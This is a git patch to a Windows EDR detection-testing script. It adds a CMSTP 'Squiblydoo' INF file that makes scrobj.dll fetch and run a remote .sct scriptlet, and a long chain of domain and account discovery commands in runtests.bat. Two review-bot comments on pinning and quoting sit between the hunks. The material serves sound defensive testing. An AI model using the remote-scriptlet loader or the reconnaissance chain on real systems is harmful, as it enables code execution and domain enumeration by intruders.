From 60ce49b70ad22c5474efa32a344fbe9f0707f556 Mon Sep 17 00:00:00 2001
From: op7ic <3172590+op7ic@users.noreply.github.com>
Date: Mon, 16 Jul 2018 15:05:59 +0100
Subject: [PATCH] update
---
 Payloads/calc.inf | 8 ++++++++
 runtests.bat | 10 +++++++---
 2 files changed, 15 insertions(+), 3 deletions(-)
 create mode 100644 Payloads/calc.inf
diff --git a/Payloads/calc.inf b/Payloads/calc.inf
new file mode 100644
index 0000000..4ed40e4
--- /dev/null
+++ b/Payloads/calc.inf
@@ -0,0 +1,8 @@
+[Version]
+Signature=$CHICAGO$
+
+[DefaultInstall]
+UnregisterDlls = Squiblydoo
+
+[Squiblydoo]
+11,,scrobj.dll,2,60,https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct
\ No newline at end of file
diff --git a/runtests.bat b/runtests.bat
index c3b5fc6..ebbd5d1 100644
--- a/runtests.bat
+++ b/runtests.bat
@@ -265,13 +265,15 @@ echo Command Excuted: for /f "tokens=1,2 delims= " %A in ('tasklist /fi ^"Image
 echo Execution Finished at %time% %date%
 sleep 3
 echo %time% %date% [+] T1033 - System Owner/User Discovery
-start "" cmd.exe /C whoami
+start "" cmd.exe /c whoami
 start "" wmic useraccount get /ALL
-start "" cmd.exe /C net group "domain administrators" /domain
+start "" cmd.exe /c net group "domain administrators" /domain
+start "" cmd.exe /c whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
 echo Execution Finished at %time% %date%
 echo Command Excuted: cmd.exe /C whoami
 echo Command Excuted: wmic useraccount get /ALL
 echo Command Excuted: cmd.exe /C net group "domain administrators" /domain
+
 sleep 3
 echo %time% %date% [+] T1158 - Hiding data in ADS
 echo "test123 > 12.txt
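Review bot: The `[Squiblydoo]` entry in the new Payloads/calc.inf references an unpinned remote script (`.../master/Payloads/Cmstp_calc.sct`), so what this test actually loads depends on whatever that URL serves at run time and on outbound HTTPS being permitted, and a run is not reproducible against a fixed payload. Pin the reference to an immutable revision (a commit-SHA raw URL, or a copy of the .sct shipped next to the INF) and note in the repository's test documentation that this case is expected to produce an outbound fetch by cmstp.exe, so that the resulting telemetry can be attributed to the test rather than mistaken for an unrelated event. Nothing in this patch invokes the INF from runtests.bat; if a CMSTP test entry is intended, it appears to be missing. The file also lacks a trailing newline.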
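Review bot: The `&` separators on the new `start "" cmd.exe /c whoami & hostname & …` line are parsed by the batch interpreter running runtests.bat, not by the child cmd.exe, so only `whoami` is handed to `start` and every later command (`hostname` through `reg query`, together with their `2>&1` redirections) runs synchronously in the script's own console. That presumably also changes the process tree a sensor records for this T1033 case, which is the behaviour the script is meant to exercise. Pass the chain intact by quoting it, `start "" cmd.exe /c "whoami & hostname & ipconfig /all & … & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1"` — cmd /c drops the outer pair of quotes when the command line contains more than two, so the inner quoted group names survive. The added line also has no `echo Command Excuted:` entry, unlike the two lines above it, so the log will not record what was run; add one alongside them. Minor: those existing echo lines still say `/C` while the start lines now use `/c`.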
@@ -393,12 +395,14 @@ echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /out echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe /out:payload.exe payload.cs echo Command Excuted: payload.exe -echo %time% %date% [+] Testing advpack via rundll32 exec +echo %time% %date% [+] Testing advpack exec start "" cmd /c rundll32.exe advpack.dll,RegisterOCX calc.exe echo Execution Finished at %time% %date% echo Command Excuted: rundll32.exe advpack.dll,RegisterOCX calc.exe + echo [+] Let tasks finish before killing all the files + sleep 90 echo [+] Cleanup